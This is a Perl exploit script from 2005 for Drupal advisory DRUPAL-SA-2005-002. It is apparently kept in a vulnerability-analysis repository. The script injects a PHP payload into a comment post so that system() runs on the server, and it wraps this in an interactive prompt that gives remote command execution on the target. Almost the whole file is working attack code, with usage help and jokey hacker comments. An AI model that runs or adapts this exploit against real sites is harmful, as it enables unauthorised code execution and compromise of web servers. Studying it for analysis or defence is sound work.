lilbool/vuln-code-analysis
0
1#!/usr/bin/perl
2# Mon Jul 4 18:19:35 CEST 2005 dab@digitalsec.net
3#
4# DRUPAL-SA-2005-002 php injection in comments (yes, its lame)
5# Hax0r code here, read before execute
6#
7# Run without arguments to show the help.
8#
9# BLINK! BLINK! BLINK! BLINK!
10#
11# Feel free to port to another stupid script language (mIRC,
12# python, TCL or orthers), and send to securiteam (AGAIN)
13#
14# Theo, this one hasn't been tested in BSD.. yet!
15# infohacking: there're a lot of xss in drupal, contact me if you want
16# to program some exploits.
17#
18# BLINK! BLINK! BLINK! BLINK!
19#
20#
21# HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE
22# contact me for pricing and offerings.
23#
24# !dSR: yubiiiiii yeooooooooooo
25#
26use LWP::UserAgent;
27use HTTP::Cookies;
28use LWP::Simple;
29use HTTP::Request::Common "POST";
30use HTTP::Response;
31use Getopt::Long;
32use strict;
33
34$| = 1; # ;1 = |$
35
36my ($proxy,$proxy_user,$proxy_pass);
37my ($host,$debug,$drupal_user,$drupal_pass);
38my $options = GetOptions (
39 'host=s' => \$host,
40 'proxy=s' => \$proxy,
41 'proxy_user=s' => \$proxy_user,
42 'proxy_pass=s' => \$proxy_pass,
43 'drupal_user=s' => \$drupal_user,
44 'drupal_pass=s' => \$drupal_pass,
45 'debug' => \$debug);
46
47&help unless ($host);
48
49while (1){
50 print "druppy461\$ ";
51 my $cmd = <STDIN>;
52 &druppy($cmd);
53}
54exit (1); # could be replaced with exit(2)
55
56
57sub druppy {
58 chomp (my $cmd = shift);
59 LWP::Debug::level('+') if $debug;
60
61 my $ua = new LWP::UserAgent(
62 cookie_jar=> { file => "$$.cookie" }); # this is a random feature
63 $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
64
65 if ($drupal_user) { # no need to exploit
66 my ($mhost, $h);
67 if ($host =~ /(http:\/\/.*?)\?q=/) {
68 $mhost = $1;
69 $h = $mhost . "?q=user/login";
70 } #some magic hacking here
71 else {
72 $host =~ /(.*?)\/.*?\//; $mhost =$1;
73 $h = $mhost . "/user/login";
74 }
75 print $h . "\n" if $debug;
76 my $req = POST $h,[
77 'edit[name]' => "$drupal_user",
78 'edit[pass]' => "$drupal_pass"
79 ]; #grab these, and send to dsr!
80 print $req->as_string() if $debug;
81 my $res = $ua->request($req);
82 print $res->content() if $debug;
83 if ($res->is_redirect eq 1) {
84 print "Logged\n" if $debug;
85 }
86 }
87
88 $ua->proxy(['http'] => $proxy) if $proxy;
89 my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
90 my $res = $ua->get("$host");
91 my $html = $res->content();
92 my @op; # buffer overflow here
93 foreach (split(/\n/,$html)) {
94 if ( m/name="op" value="(.*?)"/){
95 push(@op,$1);
96 }
97 }# xss here
98
99 my $ok = 0; # globlal for admin purposes
100 foreach my $op (@op) {
101 my $req = POST "$host",[
102 'edit[subject]' => 'test',
103 'edit[comment]' =>
104 "<?php print(\"BLAH\\n\");system(\"$cmd\"); print(\"BLAH\\n\"); php?>",
105 'edit[format]' => '2',
106 'edit[cid]' => "", # drupal is sick.. it doesn't need arguments
107 'edit[pid]' => "", # they use it to grab some statistycal information
108 'edit[nid]' => "", # about users conduits. Don't buy in internet using drupal
109 'op' => "$op"
110 ];
111
112 print $req->as_string() if $debug;
113 my $res = $ua->request($req);
114 my $html = $res->content();
115 print $html if $debug;
116 foreach (split(/\n/,$html)) {
117 return if $ok gt "1"; # super hack de phrack
118 if (/BLAH/) { $ok++; next }
119 print "$_\n" if $ok eq "1"; # /n is for another line in screen
120 }
121 }
122}
123
124
125sub help {
126 print "Syntax: ./$0 <url> [options]\n";
127 print "\t--drupal_user, --drupal_pass (needed if dont allow anonymous posts)\n";
128 print "\t--proxy (http), --proxy_user, --proxy_pass\n";
129 print "\t--debug\n";
130 print "\nExample\n";
131 print "bash# $0 --host=http://www.server.com/?q=comment/reply/1\n";
132 print "\n";
133 exit(1);
134}
135
136
137#sub 0day_solaris {
138# please put your code here
139#}
140
141# milw0rm.com [2005-07-05]